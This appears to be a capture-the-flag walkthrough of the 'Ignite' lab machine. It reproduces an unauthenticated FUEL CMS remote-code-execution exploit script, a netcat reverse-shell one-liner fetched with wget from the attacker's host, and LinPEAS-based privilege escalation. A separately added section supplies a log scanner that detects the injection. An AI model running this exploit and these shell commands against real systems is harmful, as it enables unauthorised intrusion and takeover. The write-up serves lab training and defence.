Ignite
Reconnaissance
nmap -sCV -A -O 10.10.226.192
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
We have a login page.
So I searched for this system (FUEL CMS) on the Exploit-DB site and found this:
I will use the RCE exploit because the others require authentication and we don't have any credentials.
The exploit looks like this:
import requests
import urllib

url = raw_input('target (http://IP:PORT) : ')

def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    xxxx = raw_input('cmd:')
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    r = requests.get(burp0_url)
    html = ""
    htmlcharset = r.text.find(html)
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)
    print r.text[0:dup]
It uses Python 2.
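From the defender's side, the request this exploit sends stands out in the Apache access log. The following is an added example, not part of the original write-up or of FUEL CMS: it URL-decodes the filter parameter of /fuel/pages/select/ requests and flags values that contain a quote followed by a function call. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (documentation IPs, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /fuel/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /fuel/pages/select/?filter=news HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /fuel/pages/select/?filter='
    '%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29'
    '%2b%24%61%28%27id%27%29%2b%27 HTTP/1.1" 200 1024 "-" "python-requests"',
]

# Request target inside a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Heuristic: a quote followed later by a call token such as name( or $a( ,
# which is the shape of the decoded payload in the exploit above.
CALL_RE = re.compile(r"""['"].*[\w$]+\s*\(""", re.S)

def suspicious_filter(line):
    """Return the decoded filter value if the line looks like the injection, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.rstrip("/").endswith("/fuel/pages/select"):
        return None
    # parse_qs percent-decodes each value, so encoded payloads are compared in clear.
    for value in parse_qs(parts.query, keep_blank_values=True).get("filter", []):
        if CALL_RE.search(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_filter) for every flagged line."""
    hits = []
    for line in lines:
        value = suspicious_filter(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"ALERT {ip} filter={value!r}")
```

The pattern is a heuristic and can flag legitimate filter text that happens to contain a quote and a parenthesis, so treat hits as leads to review.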
Using the RCE, we check that the machine has the wget command,
so I will use it to download and run a reverse shell file.
So I created a .sh file on my machine that contains this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f
And to access the machine, I used a Python server:
nc -lvp PORT
python3 -m http.server 80
Now I will download the file and run it on the box using the RCE:
wget IP/revshell.sh -O /tmp/revshell.sh; sh /tmp/revshell.sh
It works.
Checking if we have Python:
whereis python
We have Python, so we will use it to get a TTY:
python -c 'import pty;pty.spawn("/bin/bash")'
Again using wget, we will use LinPEAS to enumerate possible privilege escalation vectors.
We will download it on our machine, start a server, and then download it onto the box from our machine.
On our machine:
python3 -m http.server 80
On the box:
cd /tmp
wget <your_IP>/linpeas.sh
Giving it the permissions:
chmod +x linpeas.sh
Running it:
./linpeas.sh
Checking out this database:
Trying this password:
That's it, thanks for reading.